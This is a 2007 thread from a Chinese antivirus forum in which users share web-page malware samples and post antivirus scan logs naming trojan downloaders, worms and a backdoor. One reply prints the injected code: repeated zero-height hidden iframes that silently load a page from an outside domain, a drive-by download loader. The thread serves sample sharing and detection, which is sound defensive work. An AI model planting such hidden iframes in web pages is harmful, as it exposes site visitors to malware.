12
返回列表 发新帖
楼主: dikex
收起左侧

[病毒样本] Q上看到的网页挂的一堆

[复制链接]
xqiafl
发表于 2007-11-5 23:34:53 | 显示全部楼层
<iframe src="http://boc.sbb22.com/home/index.htm" width=20 height=0></iframe>




<iframe src="http://boc.sbb22.com/home/index.htm" width=20 height=0></iframe>




<iframe src="http://boc.sbb22.com/home/index.htm" width=20 height=0></iframe>




<iframe src="http://boc.sbb22.com/home/index.htm" width=20 height=0></iframe>




<iframe src="http://boc.sbb22.com/home/index.htm" width=20 height=0></iframe>




<iframe src="http://boc.sbb22.com/home/index.htm" width=20 height=0></iframe>




<iframe src="http://boc.sbb22.com/home/index.htm" width=20 height=0></iframe>
uhthn2002
发表于 2007-11-6 00:25:35 | 显示全部楼层
Uhthn Anti-Spyware V3 Alpha
Version - 3.0.0
Standard Database - 810
Paranoia Database - 48490
Heuristics Analysis - Excessive
Scan in - C:\Documents and Settings\Uhthn\Desktop\New Folder

C:\Documents and Settings\Uhthn\Desktop\New Folder\00027.exe - OK
C:\Documents and Settings\Uhthn\Desktop\New Folder\DownSetup.exe - Suspected MaliciousScope:WIN32.GENERIC.MALWARE.8
C:\Documents and Settings\Uhthn\Desktop\New Folder\mh.exe - Suspected TROJAN-DOWNLOADER (HTTP://...)
C:\Documents and Settings\Uhthn\Desktop\New Folder\NewTemp.dll - Suspected MaliciousScope:WIN32.GENERIC.MALWARE.1
C:\Documents and Settings\Uhthn\Desktop\New Folder\NewTemp.exe - Suspected MaliciousScope:WIN32.GENERIC.MALWARE.1
C:\Documents and Settings\Uhthn\Desktop\New Folder\rxjh.exe - Suspected TROJAN-DOWNLOADER (HTTP://...)
C:\Documents and Settings\Uhthn\Desktop\New Folder\servet.exe - KNOW CLEAN
C:\Documents and Settings\Uhthn\Desktop\New Folder\soft210.exe - Infected WIN32.TROJAN-DOWNLOADER.DELF.3 - Deleted
C:\Documents and Settings\Uhthn\Desktop\New Folder\tg.exe - Infected TROJAN-DOWNLOADER.AGENT.3 - Deleted
C:\Documents and Settings\Uhthn\Desktop\New Folder\WinD.tmp.exe.exe - Suspected WIN32.TROJAN-DOWNLOADER (HTTP://...)
C:\Documents and Settings\Uhthn\Desktop\New Folder\zt.exe - Suspected TROJAN-DOWNLOADER.SMALL.1

11 Files scanned
2 Infected files found
7 Suspected files found
0 Files disinfected
2 Files deleted
michaelhalu
发表于 2007-11-6 01:34:07 | 显示全部楼层
AVG和FSCS都不报,55555555555555
pmj_sh
发表于 2007-11-6 13:41:14 | 显示全部楼层
Object: 00027.exe
        Path: C:\Documents and Settings\pMj\桌面\TEMP
        Status: Virus detected
        Virus: Trojan.Win32.Agent.cnl (Engine A)
Object: DownSetup.exe
        Path: C:\Documents and Settings\pMj\桌面\TEMP
        Status: Virus detected
        Virus: Trojan-Downloader.Win32.Delf.cul (Engine A)
Object: NewTemp.dll
        Path: C:\Documents and Settings\pMj\桌面\TEMP
        Status: Virus detected
        Virus: Worm.Win32.AutoRun.bd (Engine A)
Object: NewTemp.exe
        Path: C:\Documents and Settings\pMj\桌面\TEMP
        Status: Virus detected
        Virus: Worm.Win32.AutoRun.be (Engine A)
Object: rxjh.exe
        Path: C:\Documents and Settings\pMj\桌面\TEMP
        Status: Virus detected
        Virus: Trojan.Win32.StartPage.atq (Engine A)
Object: soft210.exe
        Path: C:\Documents and Settings\pMj\桌面\TEMP
        Status: Virus detected
        Virus: Trojan-Downloader.Win32.Delf.cun (Engine A)
Object: tg.exe
        Path: C:\Documents and Settings\pMj\桌面\TEMP
        Status: Virus detected
        Virus: Trojan-Downloader.Win32.Flux.ah (Engine A)
Object: WinD.tmp.exe.exe
        Path: C:\Documents and Settings\pMj\桌面\TEMP
        Status: Virus detected
        Virus: Trojan-Downloader.Win32.Agent.eux (Engine A)
Object: zt.exe
        Path: C:\Documents and Settings\pMj\桌面\TEMP
        Status: Virus detected
        Virus: Backdoor.Win32.Agent.cmg (Engine A)
Analysis complete: 11/6/2007 13:41
    11 files checked
    9 infected files detected
    0 suspected files detected
googlehack
发表于 2007-11-6 13:54:49 | 显示全部楼层
各种类型的都具备了。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-18 05:57 , Processed in 0.101123 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表